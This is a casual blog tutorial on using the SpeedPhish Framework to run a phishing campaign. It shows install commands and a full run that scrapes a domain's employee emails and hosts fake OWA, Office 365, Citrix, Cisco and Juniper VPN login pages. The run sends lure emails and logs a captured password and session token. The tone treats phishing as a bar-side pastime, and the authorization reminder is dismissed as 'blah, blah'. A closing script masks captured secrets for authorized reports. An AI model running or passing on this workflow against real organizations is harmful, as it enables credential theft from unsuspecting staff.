Sitting at the beach bar and feeling the urge to hack something or someone? Feeling the call of social engineering? How about a quick phish? Let me tell you first that you're sick... and then tell you about SPF (SpeedPhish Framework), a tool written in Python designed for quick reconnaissance and development of phishing campaigns. So flip open your netbook and start typing...
Requirements & installation
apt-get update
apt-get upgrade -y
apt-get install build-essential python-dev python-pip phantomjs -y
pip install dnspython
pip install twisted
git clone https://github.com/tatanus/SPF.git
Execution
cd SPF/spf
python spf.py --all -d dominio.com (if you have already configured the SMTP gateway and don't want to send the emails to the victims, use --test instead)
[!] A CONFIG FILE was not specified... defaulting to [default.cfg]
/home/vmotos/SPF/spf/dominio.com/
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
/home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] Obtaining list of email targets
[*] [VERBOSE] Gathering emails via built-in methods
[*] [VERBOSE] Currently searching [google, bing, ask, dogpile, yandex, baidu, yahoo, duckduckgo]
[*] [VERBOSE] [Processing: /] Google
[*] [VERBOSE] [Processing: -] Bing
[*] [VERBOSE] [Processing: /] Ask
[*] [VERBOSE] [Processing: /] Dogpile
[*] [VERBOSE] [Processing: -] Yandex
[*] [VERBOSE] [Processing: /] Baidu
[*] [VERBOSE] [Processing: /] Yahoo
[*] [VERBOSE] [Processing: |] DuckDuckGo
[*] [VERBOSE] Gathered [14] email addresses from the Internet
[*] [VERBOSE] Gathering emails via theHarvester
[!] ERROR: theHarvester_path does not point to a valid file
[*] [VERBOSE] Collected [14] unique email addresses
[*] ----------
[*] EMAIL LIST
[*] ----------
[*] pepito@dominio.com
[*] datacenter@dominio.com
[*] I@dominio.com
[*] pedro.sanchez@dominio.com
[*] javier.martin@dominio.com
[*] prodriguez@dominio.com
[*] compania@dominio.com
[*] datacenter@dominio.com
[*] dalvarez@dominio.com
[*] jgarcia@dominio.com
[*] informatica@dominio.com
[*] lmartinez@dominio.com
[*] n@dominio.com
[*] resecionsas@dominio.com
[*] Starting phishing webserver
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] /home/vmotos/SPF/spf/dominio.com/spf.sqlite
[*] [VERBOSE] FIXED = [templates/web/owa]
[*] [VERBOSE] FIXED = [templates/web/office365]
[*] [VERBOSE] FIXED = [templates/web/cisco]
[*] [VERBOSE] FIXED = [templates/web/citrix]
[*] [VERBOSE] FIXED = [templates/web/citrix2]
[*] [VERBOSE] FIXED = [templates/web/juniper_vpn]
[*] [VERBOSE] Found the following web sites: [templates/web/owa/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/office365/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/cisco/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/citrix2/CONFIG]
[*] [VERBOSE] Found the following web sites: [templates/web/juniper_vpn/CONFIG]
[*] [VERBOSE] Started website [cisco_vpn ] on [http://169.168.1.200:8000]
[*] [VERBOSE] Started website [citrix2 ] on [http://169.168.1.200:8001]
[*] [VERBOSE] Started website [junipervpn] on [http://169.168.1.200:8002]
[*] [VERBOSE] Started website [owa ] on [http://169.168.1.200:8003]
[*] [VERBOSE] Started website [office365 ] on [http://169.168.1.200:8004]
[*] [VERBOSE] Started website [citrix ] on [http://169.168.1.200:8005]
[*] [VERBOSE] Created VHOST [cisco_vpn.dominio.com ] -> [http://169.168.1.200:8000]
[*] [VERBOSE] Created VHOST [citrix2.dominio.com ] -> [http://169.168.1.200:8001]
[*] [VERBOSE] Created VHOST [junipervpn.dominio.com] -> [http://169.168.1.200:8002]
[*] [VERBOSE] Created VHOST [owa.example.com ] -> [http://169.168.1.200:8003]
[*] [VERBOSE] Created VHOST [office365.example.com ] -> [http://169.168.1.200:8004]
[*] [VERBOSE] Created VHOST [citrix.dominio.com ] -> [http://169.168.1.200:8005]
[*] [VERBOSE] Started WebServer with pid = [5077]
[*] [VERBOSE] Locating phishing email templates
[*] [DEBUG] Found the following email template: [templates/email/citrix.txt]
[*] [DEBUG] Found the following email template: [templates/email/office365.txt]
[*] [DEBUG] Found the following email template: [templates/email/dynamic.txt]
[*] [DEBUG] Found the following email template: [templates/email/citrix2.txt]
[*] [DEBUG] Found the following email template: [templates/email/owa.txt]
[*] Sending phishing emails
[*] [VERBOSE] Sending Email to [pepito@dominio.com]
[*] Would have sent an email to [pepito@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [I@dominio.com]
[*] Would have sent an email to [I@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [pedro.sanchez@dominio.com]
[*] Would have sent an email to [pedro.sanchez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [javier.martin@dominio.com]
[*] Would have sent an email to [javier.martin@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [prodriguez@dominio.com]
[*] Would have sent an email to [prodriguez@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [compania@dominio.com]
[*] Would have sent an email to [compania@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [datacenter@dominio.com]
[*] Would have sent an email to [datacenter@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [dalvarez@dominio.com]
[*] Would have sent an email to [dalvarez@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [jgarcia@dominio.com]
[*] Would have sent an email to [jgarcia@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] [VERBOSE] Sending Email to [informatica@dominio.com]
[*] Would have sent an email to [informatica@dominio.com] with subject of [New OWA Server], but this was just a test.
[*] [VERBOSE] Sending Email to [lmanzanares@dominio.com]
[*] Would have sent an email to [lmanzanares@dominio.com] with subject of [Webmail - Office 365], but this was just a test.
[*] [VERBOSE] Sending Email to [n@dominio.com]
[*] Would have sent an email to [n@dominio.com] with subject of [New Login Portal], but this was just a test.
[*] [VERBOSE] Sending Email to [resecionsas@dominio.com]
[*] Would have sent an email to [resecionsas@dominio.com] with subject of [Updated Citrix Server], but this was just a test.
[*] Monitoring phishing website activity!
Now crack open another beer and wait...
[*] (Press CTRL-C to stop collection and generate report!)
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']
Bingo!
P.S. It goes without saying that phishing must only be done with prior authorization from the owner or the person responsible for the domain and blah, blah... be good!
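For the report on an authorized exercise, the monitoring lines shown above can be parsed into structured events with the captured secrets masked, so plaintext passwords and session tokens never reach the write-up. This is an added example, not part of the original post or of SPF itself; the field layout is inferred from the two log lines shown, the third sample line is constructed, and `parse_events`, `summarize` and `SECRET_KEYS` are hypothetical names.

```python
import re
from collections import defaultdict

# First two lines are the ones shown in the post; the third is constructed.
SAMPLE_LOG = """\
[*] ::citrix2:: 2015.07.16-13.21.44,[ACCESS],192.168.2.7
[*] ::citrix2:: 2015.07.16-13.21.58,[CREDENTIALS],192.168.2.7,password=['prueba123'], user=['pepito@dominio.com'], LoginType=['Explicit'], SESSION_TOKEN=['05F56F0AD6F7D8CD25E08F2BB935866E']
[*] ::owa:: 2015.07.16-13.25.10,[ACCESS],192.168.2.9
"""

# Layout assumed from the output above: ::site:: timestamp,[KIND],ip[,key=['value'], ...]
EVENT_RE = re.compile(
    r"::(?P<site>[^:]+)::\s+(?P<ts>[\d.\-]+),\[(?P<kind>[A-Z]+)\],"
    r"(?P<ip>[^,\s]+)(?:,(?P<fields>.*))?$"
)
SECRET_KEYS = {"password", "session_token"}  # assumption: fields to mask in reports


def parse_events(text):
    """Return one dict per monitoring line, with secret field values masked."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.search(line)
        if not m:
            continue  # banner lines, prompts, blank lines
        fields = {}
        # Split only where a new key=[' starts, so commas inside values survive.
        for part in re.split(r",\s*(?=\w+=\[')", m["fields"] or ""):
            key, _, raw = part.partition("=")
            if key:
                value = raw.strip()[2:-2]  # drop the surrounding [' and ']
                fields[key] = "<redacted>" if key.lower() in SECRET_KEYS else value
        events.append({"site": m["site"].strip(), "ts": m["ts"],
                       "kind": m["kind"], "ip": m["ip"], "fields": fields})
    return events


def summarize(events):
    """Per template: number of distinct visiting IPs and the users who submitted."""
    visits, submitters = defaultdict(set), defaultdict(set)
    for e in events:
        visits[e["site"]].add(e["ip"])
        if e["kind"] == "CREDENTIALS" and "user" in e["fields"]:
            submitters[e["site"]].add(e["fields"]["user"])
    return {site: {"visits": len(ips), "submitters": sorted(submitters[site])}
            for site, ips in visits.items()}


if __name__ == "__main__":
    for site, stats in summarize(parse_events(SAMPLE_LOG)).items():
        print(site, stats)
```
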